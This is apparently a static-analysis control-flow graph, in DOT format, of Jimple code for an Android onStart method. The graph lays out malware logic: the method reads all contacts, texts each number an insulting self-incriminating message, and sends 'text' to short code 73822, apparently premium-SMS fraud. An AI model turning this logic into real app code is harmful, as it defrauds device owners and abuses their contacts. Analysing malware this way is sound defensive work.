digraph "void onStart(android.content.Intent,int)" {
    label="void onStart(android.content.Intent,int)";
    node [shape=box];
    "0" [style=filled,fillcolor=gray,label="$r0 := @this",];
    "1" [label="$r1 := @parameter0",];
    "0"->"1";
    "2" [label="$i0 := @parameter1",];
    "1"->"2";
    "3" [label="specialinvoke $r0.onStart($r1, $i0)",];
    "2"->"3";
    "4" [label="$r2 = $r0.getContentResolver()",];
    "3"->"4";
    "5" [label="$r3 = android.provider.ContactsContract$Contacts.CONTENT_URI",];
    "4"->"5";
    "6" [label="$r4 = $r2.query($r3, null, null, null, null)",];
    "5"->"6";
    "7" [label="$r5 = android.telephony.SmsManager.getDefault()",];
    "6"->"7";
    "8" [label="$i0 = $r4.getCount()",];
    "7"->"8";
    "9" [label="if $i0 <= 0 goto label5",];
    "8"->"9";
    "10" [label="label1: $z0 = $r4.moveToNext()",];
    "9"->"10";
    "34" [style=filled,fillcolor=lightgray,label="label5: return",];
    "9"->"34";
    "11" [label="if $z0 != 0 goto label2",];
    "10"->"11";
    "12" [style=filled,fillcolor=lightgray,label="return",];
    "11"->"12";
    "13" [label="label2: $i0 = $r4.getColumnIndex(\"_id\")",];
    "11"->"13";
    "14" [label="$r6 = $r4.getString($i0)",];
    "13"->"14";
    "15" [label="$i0 = $r4.getColumnIndex(\"has_phone_number\")",];
    "14"->"15";
    "16" [label="$r7 = $r4.getString($i0)",];
    "15"->"16";
    "17" [label="$i0 = java.lang.Integer.parseInt($r7)",];
    "16"->"17";
    "18" [label="if $i0 <= 0 goto label1",];
    "17"->"18";
    "18"->"10";
    "19" [label="$r2 = $r0.getContentResolver()",];
    "18"->"19";
    "20" [label="$r3 = android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI",];
    "19"->"20";
    "21" [label="$r8 = new java.lang.StringBuilder",];
    "20"->"21";
    "22" [label="specialinvoke $r8.<init>(\"contact_id = \")",];
    "21"->"22";
    "23" [label="$r8 = $r8.append($r6)",];
    "22"->"23";
    "24" [label="$r6 = $r8.toString()",];
    "23"->"24";
    "25" [label="$r9 = $r2.query($r3, null, $r6, null, null)",];
    "24"->"25";
    "26" [label="label3: $z0 = $r9.moveToNext()",];
    "25"->"26";
    "27" [label="if $z0 != 0 goto label4",];
    "26"->"27";
    "28" [label="$r5.sendTextMessage(\"73822\", null, \"text\", null, null)",];
    "27"->"28";
    "30" [label="label4: $i0 = $r9.getColumnIndex(\"data1\")",];
    "27"->"30";
    "29" [label="goto label1",];
    "28"->"29";
    "29"->"10";
    "31" [label="$r6 = $r9.getString($i0)",];
    "30"->"31";
    "32" [label="$r5.sendTextMessage($r6, null, \"I take pleasure in hurting small animals, just thought you should know that\", null, null)",];
    "31"->"32";
    "33" [label="goto label3",];
    "32"->"33";
    "33"->"26";
}
